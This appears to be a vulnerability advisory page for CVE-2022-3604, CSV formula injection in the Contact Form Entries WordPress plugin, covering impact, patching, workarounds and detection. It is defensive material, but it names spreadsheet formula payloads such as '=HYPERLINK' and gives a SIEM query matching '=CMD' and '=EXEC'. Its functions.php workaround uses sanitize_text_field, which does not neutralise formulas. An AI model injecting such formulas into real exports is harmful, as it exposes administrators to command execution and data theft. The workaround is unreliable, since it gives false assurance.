CVE-2022-3604
📋 TL;DR
The Contact Form Entries WordPress plugin before version 1.3.0 does not properly validate user input when exporting data to CSV files, allowing attackers to inject malicious formulas or commands. This affects WordPress sites using vulnerable versions of the plugin, potentially compromising administrators who download and open exported CSV files.
💻 Affected Systems
- Contact Form Entries WordPress Plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
An attacker could inject malicious formulas or commands into CSV exports that execute when opened in spreadsheet software, potentially leading to remote code execution on the administrator's computer, data theft, or system compromise.
Likely Case
Attackers inject malicious formulas that execute when CSV files are opened in spreadsheet applications like Excel or LibreOffice, potentially leading to local file access, command execution, or data exfiltration from the administrator's system.
If Mitigated
With proper input validation and output encoding, CSV exports would contain sanitized data that cannot execute as formulas or commands when opened in spreadsheet software.
🎯 Exploit Status
Exploitation requires the attacker to submit malicious data through contact forms that gets exported to CSV, and an administrator to download and open the CSV file in vulnerable spreadsheet software.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.0
Vendor Advisory: https://wpscan.com/vulnerability/300ebfcd-c500-464e-b919-acfeb72593de/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Contact Form Entries' plugin. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 1.3.0+ from WordPress repository and manually update.
🔧 Temporary Workarounds
Disable CSV Export
allTemporarily disable CSV export functionality in plugin settings until patched.
Input Validation Filter
allAdd custom input validation to sanitize contact form submissions before they reach the plugin.
Add to theme's functions.php or custom plugin:
add_filter('wpcf7_posted_data', function($data) {
foreach($data as $key => $value) {
$data[$key] = sanitize_text_field($value);
}
return $data;
});
🧯 If You Can't Patch
- Disable the Contact Form Entries plugin entirely and use alternative form management solutions.
- Configure spreadsheet software to disable automatic formula execution when opening CSV files from untrusted sources.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for 'Contact Form Entries' version. If version is below 1.3.0, the site is vulnerable.Check Version:
wp plugin list --name='contact-form-entries' --field=versionVerify Fix Applied:
Verify plugin version is 1.3.0 or higher in WordPress admin panel. Test CSV export functionality with malicious payloads like '=HYPERLINK(...)' to confirm sanitization.📡 Detection & Monitoring
Log Indicators:
- Unusual contact form submissions containing formula syntax (=, +, -, @, etc.)
- Multiple CSV export requests from single IP addresses
- Administrator downloads of CSV files followed by unusual system activity
Network Indicators:
- POST requests to contact forms containing formula payloads
- CSV file downloads from /wp-content/uploads/cf-entries/ directory
SIEM Query:
source="wordpress" ("contact-form-entries" OR "cf-entries") AND ("=HYPERLINK" OR "=CMD" OR "=EXEC" OR formula:* AND NOT math*)